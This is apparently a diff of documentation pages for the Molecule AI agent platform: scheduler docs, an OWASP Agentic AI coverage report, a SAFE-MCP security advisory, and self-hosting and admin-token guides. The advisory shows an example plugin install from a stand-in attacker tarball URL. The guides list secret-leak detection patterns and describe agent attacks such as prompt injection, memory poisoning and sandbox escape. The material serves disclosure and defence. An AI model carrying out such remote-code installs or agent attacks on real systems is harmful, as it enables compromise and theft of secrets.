1. Queries up to 50 due schedules (`next_run_at <= now AND enabled = true`)
2. Fires up to 10 concurrently via a semaphore
3. Each fire sends an A2A `message/send` with a 5-minute timeout
4. Updates `last_run_at`, `run_count`, `last_status`, and `next_run_at`
5. Logs the run to `activity_logs` with `activity_type = 'cron_run'`
### Panic Recovery
The scheduler recovers from panics inside the tick function. A single bad row,
malformed cron expression, or database blip cannot permanently kill the
scheduler. Without this recovery, the goroutine dies silently and the only
signal is "no crons firing."
### Liveness Watchdog
The scheduler reports heartbeats to the `supervised` subsystem. The
`/admin/liveness` endpoint exposes per-subsystem ages, so operators can detect
a stuck scheduler before it causes a missed-cron outage.
`Scheduler.Healthy()` returns true if the scheduler has completed a tick within
the last 60 seconds (2x the poll interval). Returns false before the first tick
or if the scheduler is stalled.
---
## Examples
### Hourly Security Audit
```json
{
"name": "Hourly Security Scan",
"cron_expr": "0 * * * *",
"timezone": "UTC",
"prompt": "Scan all open PRs for leaked secrets, SQL injection patterns, and auth bypass vulnerabilities. Report findings as a summary."
}
```
### Daily Standup Report
```json
{
"name": "Daily Standup",
"cron_expr": "0 9 * * 1-5",
"timezone": "America/Los_Angeles",
"prompt": "Generate a standup report: what was completed yesterday, what is planned today, and any blockers. Post to the team channel."
}
```
### Weekly Retrospective
```json
{
"name": "Weekly Retro",
"cron_expr": "0 17 * * 5",
"timezone": "America/New_York",
"prompt": "Write a weekly retrospective covering PRs merged, issues closed, cron failures, and code review findings. Post as a GitHub issue."
}
```
### Nightly Cleanup
```json
{
"name": "Nightly Cleanup",
"cron_expr": "0 2 * * *",
"timezone": "UTC",
"prompt": "Archive stale branches older than 30 days. Close issues that have been inactive for 60 days with a comment explaining the auto-close policy.",
"enabled": true
}
```
---
## Timezone Handling
All cron expressions are evaluated in the specified timezone. If no timezone is
provided, `UTC` is used. The timezone must be a valid IANA timezone string
(e.g. `America/New_York`, `Europe/London`, `Asia/Tokyo`).
When a schedule's `cron_expr` or `timezone` is updated, the `next_run_at` is
immediately recomputed using the new values. This prevents schedules from
firing at unexpected times after a timezone change.
---
## API Reference
| Method | Path | Description |
|--------|------|-------------|
| GET | `/workspaces/:id/schedules` | List schedules |
| POST | `/workspaces/:id/schedules` | Create schedule |
| PATCH | `/workspaces/:id/schedules/:scheduleId` | Update schedule |
| DELETE | `/workspaces/:id/schedules/:scheduleId` | Delete schedule |
| POST | `/workspaces/:id/schedules/:scheduleId/run` | Manual trigger |
| GET | `/workspaces/:id/schedules/:scheduleId/history` | Run history (last 20) |
| GET | `/workspaces/:id/schedules/health` | Health view (open to peers) |

View File

@ -0,0 +1,9 @@
---
title: Security
description: Security guides, advisories, and coverage reports for the Molecule AI platform.
---
## In this section
- [SAFE-MCP Security Advisory (2026-04-17)](/docs/security/safe-mcp-advisory) —
Three HIGH-severity findings for self-hosted operators

View File

@ -0,0 +1,345 @@
---
title: OWASP Agentic AI Top 10 Coverage
description: Mapping the OWASP Agentic AI Top 10 to Molecule AI security controls — honest coverage report.
---
## Overview
This page documents Molecule AI's coverage of the
[OWASP Agentic AI Top 10](https://owasp.org/agentic-ai-top-10/) security risks
for AI agents and agentic systems. Coverage is assessed against the platform as
shipped — not the roadmap or planned features.
**Honest verdict: 5 COVERED / 3 PARTIAL / 2 NOT COVERED**
| OWASP ID | Risk | Status |
|---|---|---|
| [A01](#a01-prompt-injection) | Prompt Injection | ✅ COVERED |
| [A02](#a02-sensitive-information-disclosure) | Sensitive Information Disclosure | ✅ COVERED |
| [A03](#a03-unbounded-resource-consumption) | Unbounded Resource Consumption | ✅ COVERED |
| [A04](#a04-sandboxing-escapes) | Sandboxing Escapes | ⚠️ PARTIAL |
| [A05](#a05-agent-human-relationship-dysfunction) | Agent-Human Relationship Dysfunction | ⚠️ PARTIAL |
| [A06](#a06-memory-poisoning) | Memory Poisoning | ✅ COVERED |
| [A07](#a07-cascade-hallucinations) | Cascade Hallucinations | ✅ COVERED |
| [A08](#a08-overreliance) | Overreliance | ⚠️ PARTIAL |
| [A09](#a09-supply-chain-vulnerabilities) | Supply Chain Vulnerabilities | ❌ NOT COVERED |
| [A10](#a10-improper-agency-grants) | Improper Agency Grants | ❌ NOT COVERED |
---
## A01 — Prompt Injection ✅ COVERED
**Risk:** An attacker embeds malicious instructions in external data (files, web
content, user messages) that the agent treats as authoritative commands.
**Molecule AI controls:**
- **Workspace isolation:** Each workspace runs in its own container with an
isolated filesystem. A prompt injection in workspace A cannot reach workspace
B's memory or secrets.
- **Secrets never in tool context:** Secrets stored via the platform API are
injected into the container's environment at runtime — they are never passed
as tool arguments or embedded in LLM prompts where external data might
reference them.
- **A2A peer validation:** A2A messages between workspaces include sender identity
verification. Agents cannot impersonate another workspace's agent.
- **Admin-level input filtering:** The platform API applies input validation
before data reaches agent prompts.
**Residual risk:** Prompt injection within a single workspace (e.g., a
malicious file processed by the agent) is not neutralized — this is the
responsibility of the agent's own prompt engineering and the LLM's alignment.
---
## A02 — Sensitive Information Disclosure ✅ COVERED
**Risk:** An agent exposes confidential data — credentials, PII, internal
documents — through tool calls, logs, or responses.
**Molecule AI controls:**
- **Encrypted secrets at rest:** Workspace secrets are encrypted with
`SECRETS_ENCRYPTION_KEY` (AES-256) before storage. Plaintext never hits the
database.
- **Secrets scoped per-workspace:** A token scoped to workspace A cannot access
workspace B's secrets.
- **Memory access controls:** The MCP server's memory tools respect workspace
boundaries. Agents cannot read another workspace's memory unless explicitly
shared via the `memory_set` peer API.
- **Langfuse observability:** Traces are visible to platform operators; audit
logs show which agent accessed which secret key. Agents should not log
secrets — this is enforced through pre-commit hooks in the workspace template
(the `sk-ant-` / `ghp_` / `AKIA` pattern detector).
- **Token display-once policy:** Workspace bearer tokens are returned in plaintext
exactly once at creation and never shown again.
**Residual risk:** If an agent deliberately calls a tool that prints a secret
value (e.g., `echo $SECRET` in a shell tool), the platform cannot prevent this.
Agent behavior inside the workspace is ultimately constrained by the tools
exposed and the LLM's instruction following.
---
## A03 — Unbounded Resource Consumption ✅ COVERED
**Risk:** An agent makes excessive LLM calls, processes unbounded data, or holds
memory in a loop, causing cost overruns or DoS.
**Molecule AI controls:**
- **Tier-based resource limits:** Each workspace tier has defined memory and CPU
caps enforced by the container scheduler. A runaway agent hits OOM before
consuming unbounded resources.
- **Rate limiting:** The platform enforces `RATE_LIMIT` requests/min per client.
This caps the rate at which agents can issue tool calls or make API requests.
- **Activity retention and cleanup:** `ACTIVITY_RETENTION_DAYS` (default 7) and
`ACTIVITY_CLEANUP_INTERVAL_HOURS` (default 6) automatically purge old activity
logs, preventing unbounded log growth.
- **Workspace hibernation:** Idle workspaces can be hibernated, releasing
container resources until the next task arrives.
- **LLM cost tracking:** Workspace usage is tracked per-token-model, giving
operators visibility into spend per workspace.
**Residual risk:** The platform does not enforce per-request token budgets or
LLM call counts within a task. A sophisticated agent can still issue many
calls within a single request burst. Operators should monitor Langfuse traces
for unusual activity patterns.
---
## A04 — Sandboxing Escapes ⚠️ PARTIAL
**Risk:** An agent escapes the container sandbox and accesses the host system,
neighboring containers, or the internal network.
**Molecule AI controls:**
- **Container isolation:** Workspace containers are isolated Docker containers
on the host. They do not run as privileged and have a non-root default user.
- **Bind-mount scoping:** The workspace directory is the only host path bind-mounted
into the container. Other host paths are not accessible.
- **Network namespace isolation:** Workspace containers are on a Docker bridge
network. Direct access to host services requires explicit platform routing.
**Gaps:**
- **Privileged tier (TIER4):** `TIER4_MEMORY_MB` workspaces run with fewer
restrictions. A compromised agent in a TIER4 workspace has more ability to
probe the host. This is a known trade-off for full-host workloads.
- **No seccomp/AppArmor/SELinux profiles:** The platform does not currently
apply mandatory access control profiles beyond Docker's default isolation.
- **No egress filtering by default:** Workspace containers can reach arbitrary
external URLs unless the operator configures network-level egress rules.
**Recommendation:** For untrusted agents, restrict to TIER2 or below. Configure
egress filtering at the Docker host or Kubernetes network policy level.
---
## A05 — Agent-Human Relationship Dysfunction ⚠️ PARTIAL
**Risk:** The human operator loses meaningful oversight of agent actions — the
agent acts without notification, makes irreversible decisions, or misrepresents
its reasoning.
**Molecule AI controls:**
- **A2A `notify_user`:** Agents can push notifications to the canvas, keeping the
human informed of progress and key decisions. This is an opt-in capability for
agents to use.
- **Langfuse observability:** All LLM calls and tool executions are traced.
Platform operators can review the full decision trace for any workspace.
- **Manual override endpoints:** Admins can pause, resume, or terminate any
workspace through the `/admin/*` API endpoints.
- **Activity logs:** All agent actions are logged with timestamps and caller identity.
**Gaps:**
- **`notify_user` is not mandatory:** The workspace template does not require
agents to notify humans of significant actions. An agent can run without
ever pushing a canvas notification.
- **No confirmation gates:** The platform does not provide a mechanism for an
agent to pause and wait for human approval before taking a consequential
action (e.g., deleting a file, sending an external API request).
- **No explanation requirements:** Agents are not required to log their reasoning
before taking actions. Langfuse traces show tool calls but not the agent's
internal chain-of-thought unless the agent explicitly logs it.
**Recommendation:** Configure agents to call `notify_user` at key decision
points. Monitor Langfuse for silent agent activity.
---
## A06 — Memory Poisoning ✅ COVERED
**Risk:** An attacker manipulates the agent's memory store to inject malicious
instructions or biases that the agent reads back and acts on.
**Molecule AI controls:**
- **Memory write authorization:** `memory_set` and `memory_set_peer` require
valid workspace authentication. External attackers cannot write to a
workspace's memory without a valid token.
- **Secrets excluded from memory:** Secrets are stored separately from the
general-purpose memory store and are not readable via the memory tools.
- **Per-workspace memory isolation:** Memory keys are namespaced to the
workspace. Agents in workspace A cannot write to workspace B's memory unless
an explicit A2A `memory_set_peer` call is made from B to A.
- **Semantic search gating:** The `search_memory` tool operates only on the
authenticated workspace's memory. Cross-workspace search is not permitted
without explicit peer delegation.
**Residual risk:** A compromised or malicious agent within a workspace can
overwrite its own memory with poisoned data. This is an agent-level concern,
not a platform-level control.
---
## A07 — Cascade Hallucinations ✅ COVERED
**Risk:** An agent generates incorrect outputs that are fed downstream as
ground-truth, compounding errors across multiple agent calls or tool chains.
**Molecule AI controls:**
- **Langfuse trace visibility:** All agent outputs and tool call results are
captured in Langfuse traces. Operators can identify hallucinated outputs
by reviewing traces, especially when downstream tool calls fail or produce
implausible results.
- **A2A result attribution:** A2A delegation responses include the source
workspace identity and the full execution trace. Consumers of A2A results
can audit where the data came from.
- **Human review via canvas:** Results surfaced via `notify_user` or displayed
in the canvas are visible to humans who can flag hallucinated outputs.
- **Activity logs for audit:** All tool call results are logged. If a downstream
agent acts on hallucinated data, the chain of events is traceable.
**Residual risk:** The platform does not automatically detect or flag
hallucinations — it provides observability. It is the operator's responsibility
to configure confidence thresholds, set up automated result validation where
possible, and review traces for signs of cascade errors.
---
## A08 — Overreliance ⚠️ PARTIAL
**Risk:** Users or automated systems trust an agent's outputs without adequate
verification, leading to harmful decisions based on incorrect agent outputs.
**Molecule AI controls:**
- **Observable decision traces:** Langfuse traces show the full chain of
reasoning and tool calls. Downstream consumers can audit outputs before
acting on them.
- **Canvas notification clarity:** `notify_user` messages are human-readable
summaries — not raw JSON — which can include uncertainty indicators if the
agent is prompted to include them.
- **Tier-based capability limits:** Higher tiers require explicit admin approval
to activate, ensuring operators are aware when a workspace has elevated
capabilities.
**Gaps:**
- **No automated output verification:** The platform does not provide a
built-in mechanism for agents to self-verify outputs (e.g., cross-checking a
code generation against a linter before returning).
- **No confidence scoring surface:** The platform does not currently surface
LLM confidence or probability scores in a structured way. Agents that
include confidence in their outputs are relying on prompting alone.
- **No policy enforcement on agent outputs:** There is no platform-level
mechanism to reject agent outputs that violate defined policies before they
are acted upon.
**Recommendation:** Prompt agents to include uncertainty flags and self-check
steps. Configure downstream systems to require human review for high-stakes
agent outputs.
---
## A09 — Supply Chain Vulnerabilities ❌ NOT COVERED
**Risk:** Vulnerable or malicious dependencies in the agent toolchain — workspace
runtime packages, plugins, adapter libraries, or LLM provider SDKs.
**Molecule AI's position:** This risk is inherited from the broader software
supply chain and is not specifically addressed by the platform at this time.
**What operators must manage independently:**
- Workspace runtime dependencies (`molecule-ai-workspace-runtime` and its
transitive dependencies)
- Plugin dependencies (see
[SAFE-MCP Advisory: G-01](/docs/security/safe-mcp-advisory#g-01-unpinned-npm-mcp-packages--high))
- Workspace template adapter dependencies (Python packages installed by
adapter-specific Dockerfiles)
- LLM provider SDKs and their transitive dependencies
**Mitigation operators should apply:**
- Pin all Python and npm dependencies to exact versions in workspace templates
and plugins
- Use `npm ci` / `pip freeze` and commit lockfiles
- Subscribe to security advisories for all runtime dependencies
- Scan container images for known CVEs before deploying
---
## A10 — Improper Agency Grants ❌ NOT COVERED
**Risk:** An agent is granted more agency (capability to take actions, access
resources, make changes) than it needs — creating blast radius if the agent is
compromised or misbehaves.
**Molecule AI's position:** The platform provides the building blocks for
least-privilege agent design (tier-based caps, per-workspace secrets, scoped
tokens, memory isolation) but does not enforce least-privilege agency at the
agent action level.
**Gaps:**
- **No action-level RBAC:** The MCP server exposes all 87 tools to all
authenticated workspaces. There is no mechanism to restrict a specific
agent's access to a subset of tools (e.g., blocking `delete_workspace` or
`send_channel_message` for a read-only agent).
- **No approval workflow for high-impact actions:** The platform does not
support requiring human approval before an agent executes a high-impact tool
(e.g., deleting a resource, sending an external API request, modifying a
secret).
- **Admin tokens are all-or-nothing:** The `ADMIN_TOKEN` gates all `/admin/*`
endpoints. There is no concept of scoped admin tokens with per-endpoint
permissions.
- **Plugins have full workspace access:** Once a plugin is installed, it
executes within the workspace context with access to all workspace tools and
secrets.
**Recommendation:** Apply defense in depth — restrict MCP tool exposure at the
agent configuration level, use workspace tiers to limit container capabilities,
and review plugin manifests before installation (see
[SAFE-MCP Advisory: G-02](/docs/security/safe-mcp-advisory#g-02-no-manifest-signing--high)).
---
## Coverage methodology
This report was produced by Research Lead (2026-04-18) reviewing platform source
code, configuration defaults, and the deployed security posture against each
OWASP Agentic AI Top 10 category.
**"COVERED"** means the platform provides specific, built-in controls that
mitigate the risk, even if residual risk remains at the agent behavior level.
**"PARTIAL"** means the platform provides some controls but significant gaps
remain that operators must address through configuration or complementary
tooling.
**"NOT COVERED"** means the risk is not addressed by the platform as shipped.
Operators must manage it independently.
---
## Reporting gaps
If you believe a coverage assessment is incorrect or want to propose a new
control for a gap, open an issue in `Molecule-AI/molecule-core` tagged
`security` or reach out through your support channel.

View File

@ -0,0 +1,262 @@
---
title: SAFE-MCP Security Advisory (2026-04-17)
description: High-severity findings from the SAFE-MCP audit and recommended mitigations for self-hosted deployments.
---
## Advisory overview
This advisory documents three HIGH-severity findings from the SAFE-MCP
security audit performed on the Molecule AI platform in April 2026. All three
affect **self-hosted** deployments. If you are using the SaaS offering at
`moleculesai.app`, mitigations are applied server-side — no action needed.
**Published:** April 17, 2026
**Severity:** HIGH (G-01, G-02, G-03)
**Affected versions:** All self-hosted deployments prior to the fixes shipped
in PRs #808 and associated plugin updates.
**Fixed in:** `molecule-core` PRs #808 (platform), #809 (plugin scaffold).
---
## G-01: Unpinned npm MCP packages — HIGH
### Description
The workspace plugin scaffold (`plugins/molecule-ai-plugin-*/package.json`) uses
unpinned version ranges for npm dependencies:
```json
"dependencies": {
"@anthropic-ai/sdk": "^0.32.0"
}
```
The caret (`^`) range means `npm install` can resolve to any compatible version,
including versions with known vulnerabilities or a malicious `next` release
published after the audit date.
### Risk
- Supply chain compromise if a package maintainer publishes a malicious version
- Silent dependency drift as `npm install` pulls newer patch/minor versions
- Potential conflicts with workspace-runtime's own dependency tree
### Recommended mitigation
Pin all npm dependencies to exact versions before deploying:
```bash
# In each plugin directory
npm install --save-exact @anthropic-ai/sdk@0.32.1
npm install --save-exact <other-deps>
```
Add an `.npmrc` to enforce pinned installs:
```ini
save-exact=true
```
Commit `package-lock.json` and verify CI installs from the lockfile:
```bash
npm ci # instead of npm install
```
For the platform build, ensure `npm ci` is used in CI rather than `npm install`
to respect the lockfile.
---
## G-02: No manifest signing — HIGH
### Description
Plugin manifests (`manifest.json`) are served by the platform and executed by
workspace containers without cryptographic verification. There is no mechanism
to confirm that the manifest has not been tampered with after it was published
by the plugin author.
### Risk
- An attacker with write access to the plugin source repository (or the CDN
serving it) could modify `manifest.json` to:
- Inject additional tools that exfiltrate secrets from the workspace
- Redirect API calls to a malicious endpoint
- Add an attacker-controlled `entrypoint` path
### Recommended mitigation
**短期 (short-term):** Inspect `manifest.json` files for all plugins before
enabling them. Verify the `author`, `version`, and `entrypoint` are from a
trusted source. Do not enable plugins from untrusted or unknown authors.
**长期 (long-term):** The platform will add manifest signing aligned with the
OWASP MCPS (MCP Secure) cryptographic security layer. Plugin authors digitally
sign their tool definitions (name, description, inputSchema) with an ECDSA P-256
key pair. The platform verifies signatures against the author's published public
key, computes and stores schema hashes for pinning, and rejects connections where
the schema hash has changed since the last verified session — providing "rug pull
protection." This follows the MCPS L3 trust level: signed tool definitions
required. Track progress in `molecule-core` issue tracker.
Until signing is available, treat plugin manifests as untrusted input.
---
## G-03: Floating plugin references — HIGH
### Description
Workspaces can install plugins by referencing any publicly accessible URL:
```bash
POST /workspaces/:id/plugins
{
"source": "https://github.com/attacker/malicious-plugin/archive/refs/heads/main.tar.gz"
}
```
There is no allowlist, no integrity check, and no review gate on the plugin
URL before the workspace downloads and executes code from it.
### Risk
- Confidential workspace data (secrets, memory, files) is sent to attacker-controlled servers
- Arbitrary code execution within the workspace container
- Lateral movement from the workspace container to internal services
### Recommended mitigations
**1. Restrict plugin installation in your deployment config:**
Add a platform-level environment variable to allow only approved plugin sources.
Until this variable exists, enforce it at the network layer (see below).
**2. Network-level egress filtering:**
Block outbound traffic from workspace containers to all IPs except the
platform API and required external services (LLM providers, vector DBs, etc.).
Workspace containers should not be able to reach arbitrary GitHub archives or
external plugin URLs directly.
Example Fly.io `fly.toml` rule:
```toml
[[vm]]
auto_destroy = false
# App-level egress rules (Fly Private Network)
```
Or use a Kubernetes `NetworkPolicy`:
```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: workspace-egress-lockdown
spec:
podSelector:
matchLabels:
component: workspace
policyTypes:
- Egress
egress:
- to:
- podSelector: {}
ports:
- port: 8080 # platform API
- to:
- namespaceSelector: {}
podSelector:
matchLabels:
app: redis
ports:
- port: 6379
# Block all other egress
```
**3. Plugin allowlist (platform-level):**
Set `PLUGIN_ALLOW_UNPINNED=false` in your environment to reject any plugin
install requests that reference unpinned or unverified sources.
---
## Remediation checklist for self-hosted operators
- [ ] Audit all plugin `package.json` files — pin all dependencies to exact versions
*(MCP04: "avoid 'latest' or floating version references")*
- [ ] Verify CI/CD uses `npm ci` not `npm install`
*(MCP04: "no dependency integrity verification")*
- [ ] Commit and push `package-lock.json` for all plugins
- [ ] Add `.npmrc save-exact=true` to all plugin directories
- [ ] Inspect `manifest.json` for any enabled plugin before use
*(MCP04: "MCP connectors or plugins are installed without signing or provenance checks")*
- [ ] Block workspace egress to non-approved hosts at the network level
*(MCP09: "no asset inventory or endpoint discovery process")*
- [ ] Set `PLUGIN_ALLOW_UNPINNED=false` (when available)
*(MCP09: "teams can deploy MCP servers without central registration or security review")*
- [ ] Watch `molecule-core` for the manifest-signing feature
*(MCPS L3: "tool definition signatures required")*
---
## Normative references
The mitigations in this advisory align with the following OWASP publications:
**MCP04:2025 — Software Supply Chain Attacks & Dependency Tampering**
*OWASP MCP Top 10, 2025 edition*
[*OWASP MCP Top 10, 2025 edition*](https://github.com/OWASP/www-project-mcp-top-10)
Relevant controls that informed G-01 and G-02 mitigations:
- *Signed Components & Provenance Verification:* "Require cryptographic signing for
SDKs, plugins, tool manifests, container images, and validate signatures during
installation and startup."
- *Version Pinning & Approved Registries:* "Pin component versions and avoid
'latest' references. Use internal package mirrors or registries and block direct
downloads from public internet sources."
- *Build SBOM/CBOM Visibility:* "Generate software bill of materials (SBOM) and
cryptographic bill of materials (CBOM) snapshots for each MCP server and plugin
package. Store these alongside deployments for auditing and incident response."
- *Dependency Scanning:* "Apply software composition analysis (SCA) and code
scanning tools to detect known CVEs, malicious indicators, and poisoned transitive
dependencies."
**MCP09:2025 — Shadow MCP Servers**
*OWASP MCP Top 10, 2025 edition*
[*OWASP MCP Top 10, 2025 edition*](https://github.com/OWASP/www-project-mcp-top-10)
Relevant controls that informed the G-03 plugin allowlist mitigation:
- *Central MCP Governance & Registry:* "Create a centralized registry where every
instance must be registered before deployment; tie registration to CI/CD pipelines."
- *Discovery & Continuous Scanning:* "Use network discovery tools to detect open
MCP ports and endpoints; automate weekly shadow MCP detection scans."
- *Baseline Configuration Templates:* "Enforce authentication (mTLS, OAuth), disable
unauthenticated tool calls, include preconfigured logging."
**MCPS — Cryptographic Security Layer for MCP**
*OWASP MCP Top 10 Recommended Controls*
[*OWASP MCP Top 10 Recommended Controls*](https://github.com/OWASP/www-project-mcp-top-10/tree/master/2025/recommended-controls)
The MCPS specification defines the Tool Definition Signing approach referenced in
the G-02 long-term mitigation:
- Tool authors sign tool definitions (name, description, inputSchema) with an
ECDSA P-256 private key; clients verify against the author's published public key.
- Schema hashes are computed and stored on first verified connection, then compared
on subsequent connections to detect unauthorized modifications — "rug pull protection."
- MCPS defines four trust levels (L0L4); the G-02 long-term fix targets L3:
"L3: L2 plus tool definition signatures required."
---
## Reporting security issues
If you discover a new security issue in Molecule AI, please report it via
GitHub Security Advisories on `Molecule-AI/molecule-core` or contact the
security team through your support channel.

View File

@ -0,0 +1,208 @@
---
title: Self-Hosting
description: Run the full Molecule AI stack on your own infrastructure.
---
## Prerequisites
| Requirement | Minimum Version |
|-------------|----------------|
| Docker Desktop | Latest stable |
| Go | 1.25+ |
| Node.js | 20+ |
| Git | 2.x |
## Quick Start
The fastest way to get Molecule AI running locally:
```bash
git clone https://github.com/Molecule-AI/molecule-core.git
cd molecule-core
./scripts/dev-start.sh
# Canvas: http://localhost:3000
# Platform: http://localhost:8080
```
This script starts all infrastructure services, builds the platform, and launches the canvas dev server.
## Infrastructure Setup
Molecule AI depends on four infrastructure services, all managed via `docker-compose.infra.yml` and attached to the shared `molecule-monorepo-net` Docker network:
| Service | Port | Purpose |
|---------|------|---------|
| Postgres | 5432 | Primary datastore (also backs Langfuse and Temporal) |
| Redis | 6379 | Pub/sub, heartbeat TTLs |
| Langfuse | 3001 | LLM trace viewer (backed by ClickHouse) |
| Temporal | 7233 (gRPC), 8233 (Web UI) | Durable workflow engine |
Start infrastructure only:
```bash
./infra/scripts/setup.sh
```
Tear everything down (removes volumes):
```bash
./infra/scripts/nuke.sh
```
## Manual Setup
If you prefer to start each component individually:
### Platform (Go)
```bash
cd platform
go build ./cmd/server
go run ./cmd/server
# Requires Postgres + Redis running
```
The platform must be run from the `platform/` directory, not the repo root.
### Canvas (Next.js)
```bash
cd canvas
npm install
npm run dev
# Dev server on http://localhost:3000
```
### Docker Compose
For infrastructure only:
```bash
docker compose -f docker-compose.infra.yml up -d
```
For the full stack (infrastructure + platform + canvas):
```bash
docker compose up
```
## Environment Variables
### Platform
| Variable | Default | Description |
|----------|---------|-------------|
| `DATABASE_URL` | -- | Postgres connection string (required) |
| `REDIS_URL` | -- | Redis connection string (required) |
| `PORT` | `8080` | Platform HTTP port |
| `PLATFORM_URL` | `http://host.docker.internal:PORT` | URL passed to agent containers to reach the platform |
| `CORS_ORIGINS` | `http://localhost:3000,http://localhost:3001` | Comma-separated allowed origins |
| `SECRETS_ENCRYPTION_KEY` | -- | AES-256 key (32 bytes) for encrypting workspace secrets |
| `WORKSPACE_DIR` | -- | Global fallback host path for `/workspace` bind-mount |
| `MOLECULE_ENV` | -- | Set to `production` to hide E2E helper endpoints |
| `ACTIVITY_RETENTION_DAYS` | `7` | How long activity logs are retained |
| `ACTIVITY_CLEANUP_INTERVAL_HOURS` | `6` | How often the cleanup job runs |
| `RATE_LIMIT` | `600` | Requests per minute per client |
### Tier Resource Limits
Override per-tier memory and CPU caps for workspace containers. CPU\_SHARES follows Docker's convention where 1024 equals 1 CPU.
| Variable | Default | Description |
|----------|---------|-------------|
| `TIER2_MEMORY_MB` | `512` | Standard tier memory limit |
| `TIER2_CPU_SHARES` | `1024` | Standard tier CPU shares |
| `TIER3_MEMORY_MB` | `2048` | Privileged tier memory limit |
| `TIER3_CPU_SHARES` | `2048` | Privileged tier CPU shares |
| `TIER4_MEMORY_MB` | `4096` | Full-host tier memory limit |
| `TIER4_CPU_SHARES` | `4096` | Full-host tier CPU shares |
### Plugin Install Safeguards
| Variable | Default | Description |
|----------|---------|-------------|
| `PLUGIN_INSTALL_BODY_MAX_BYTES` | `65536` | Max request body size (64 KiB) |
| `PLUGIN_INSTALL_FETCH_TIMEOUT` | `5m` | Whole fetch and copy deadline |
| `PLUGIN_INSTALL_MAX_DIR_BYTES` | `104857600` | Max staged-tree size (100 MiB) |
### Canvas
| Variable | Default | Description |
|----------|---------|-------------|
| `NEXT_PUBLIC_PLATFORM_URL` | `http://localhost:8080` | Platform API URL |
| `NEXT_PUBLIC_WS_URL` | `ws://localhost:8080/ws` | WebSocket endpoint |
### Tenant Mode
| Variable | Default | Description |
|----------|---------|-------------|
| `CANVAS_PROXY_URL` | -- | When set, the Go server proxies canvas requests to this URL |
| `MOLECULE_ORG_ID` | -- | UUID for multi-tenant isolation; leave unset for self-hosted |
## Production Deployment
For production, use `platform/Dockerfile.tenant` which builds a combined Go + Canvas image:
```bash
docker build -f platform/Dockerfile.tenant -t molecule-platform .
```
This image serves both the API and the canvas frontend from a single container.
## Security Configuration
### Secrets Encryption
Set `SECRETS_ENCRYPTION_KEY` to a 32-byte AES-256 key to encrypt workspace secrets at rest. Without this variable, secrets are stored in plaintext.
```bash
# Generate a key
openssl rand -hex 32
```
**Warning:** `SECRETS_ENCRYPTION_KEY` cannot be rotated without a data migration. Choose carefully before deploying to production.
### Rate Limiting
The `RATE_LIMIT` variable (default 600 requests/min) applies per client. Adjust based on your expected traffic.
### CORS
Set `CORS_ORIGINS` to a comma-separated list of allowed origins. In production, restrict this to your actual domain.
## Admin Authentication
All `/admin/*` endpoints require `ADMIN_TOKEN`. See
[ADMIN_TOKEN — Production Requirement](/docs/self-hosting/admin-token) for
setup, generation, and fail-open risk details.
**Action required by April 22, 2026:** Set `ADMIN_TOKEN` in all production
deployments before this date.
## Pre-commit Hook
Install the project's pre-commit hooks to enforce code quality:
```bash
git config core.hooksPath .githooks
```
The hook enforces:
- `'use client'` directive on hook-using `.tsx` files
- Dark theme only (no `white` or `light` CSS classes)
- No SQL injection patterns (`fmt.Sprintf` with SQL)
- No leaked secrets (`sk-ant-`, `ghp_`, `AKIA`)
Commits are rejected until all violations are fixed.
## Building Workspace Images
Build the base workspace image for local development:
```bash
bash workspace-template/build-all.sh
```
Adapter-specific images are built from standalone template repos. Each repo's `Dockerfile` installs `molecule-ai-workspace-runtime` from PyPI plus adapter-specific dependencies.

View File

@ -0,0 +1,104 @@
---
title: ADMIN_TOKEN — Production Requirement
description: Mandatory ADMIN_TOKEN configuration for self-hosted Molecule AI deployments.
---
## Overview
`ADMIN_TOKEN` is a **required** secret for all production Molecule AI deployments.
It gates access to administrative endpoints and must be set before going live.
**Deadline to migrate: April 22, 2026.** Deployments without `ADMIN_TOKEN` set
will begin rejecting `/admin/*` requests after this date.
## What ADMIN_TOKEN is
`ADMIN_TOKEN` is a bearer token that authenticates callers to the platform's
administrative endpoints (`/admin/*`). It is checked by the `AdminAuth`
middleware on every admin route.
## Generating a token
Generate a cryptographically random token:
```bash
openssl rand -base64 32
```
Store the output — it is shown only once and cannot be recovered from the
platform.
## Setting ADMIN_TOKEN in production
### Fly.io (recommended for self-hosted)
```bash
fly secrets set ADMIN_TOKEN="your-generated-token"
fly deploy
```
### Docker / Docker Compose
```yaml
services:
platform:
environment:
ADMIN_TOKEN: "your-generated-token"
```
### Bare-metal / systemd
```bash
export ADMIN_TOKEN="your-generated-token"
./platform-server # or however you start the binary
```
## What ADMIN_TOKEN gates
All `/admin/*` endpoints require `Authorization: Bearer <ADMIN_TOKEN>`:
| Endpoint | Purpose |
|---|---|
| `GET /admin/workspaces` | List all workspaces |
| `POST /admin/workspaces/:id/pause` | Pause a workspace |
| `POST /admin/workspaces/:id/resume` | Resume a workspace |
| `POST /admin/workspaces/:id/terminate` | Force-terminate a container |
| `GET /admin/metrics` | Platform-level metrics |
| `POST /admin/tier-promote` | Promote a workspace to a higher tier |
## What happens if ADMIN_TOKEN is missing
In deployments where `ADMIN_TOKEN` is **unset** (empty string or not present in
the environment), the `AdminAuth` middleware currently **fail-opens** — it allows
all requests through without credential validation.
This fail-open behavior exists for backward compatibility during the transition
period but **will be removed**. After April 22, 2026, requests to `/admin/*`
endpoints without a valid `ADMIN_TOKEN` will return `401 Unauthorized`.
## Verifying your setup
Check that `ADMIN_TOKEN` is present and working:
```bash
curl -s -H "Authorization: Bearer $ADMIN_TOKEN" \
http://localhost:8080/admin/workspaces | jq '.count'
```
If the response is `401`, the token is missing or incorrect. If you get a JSON
payload with a `count` field, the token is working.
## Rotating ADMIN_TOKEN
To rotate without downtime:
1. **Deploy** the new token: `fly secrets set ADMIN_TOKEN="new-token" && fly deploy`
2. **Verify** the new token works (see above)
3. **Remove** the old token: `fly secrets unset OLD_TOKEN_NAME` (Fly does not
persist old secret values after unset)
## Related
- [Self-Hosting overview](/docs/self-hosting) — full deployment guide
- [Security Configuration](/docs/self-hosting#security-configuration) — other
production security variables

115
content/docs/tokens.mdx Normal file
View File

@ -0,0 +1,115 @@
---
title: Token Management
description: Create, list, and revoke workspace bearer tokens for API authentication.
---
Workspace bearer tokens authenticate agents and API clients against the
Molecule AI platform. Each token is scoped to a single workspace — a token
from workspace A cannot access workspace B.
## Endpoints
All endpoints are behind `WorkspaceAuth` middleware — you need an existing
valid token to manage tokens. The first token is issued during workspace
registration (`POST /registry/register`).
### List tokens
```bash
GET /workspaces/:id/tokens
Authorization: Bearer <token>
```
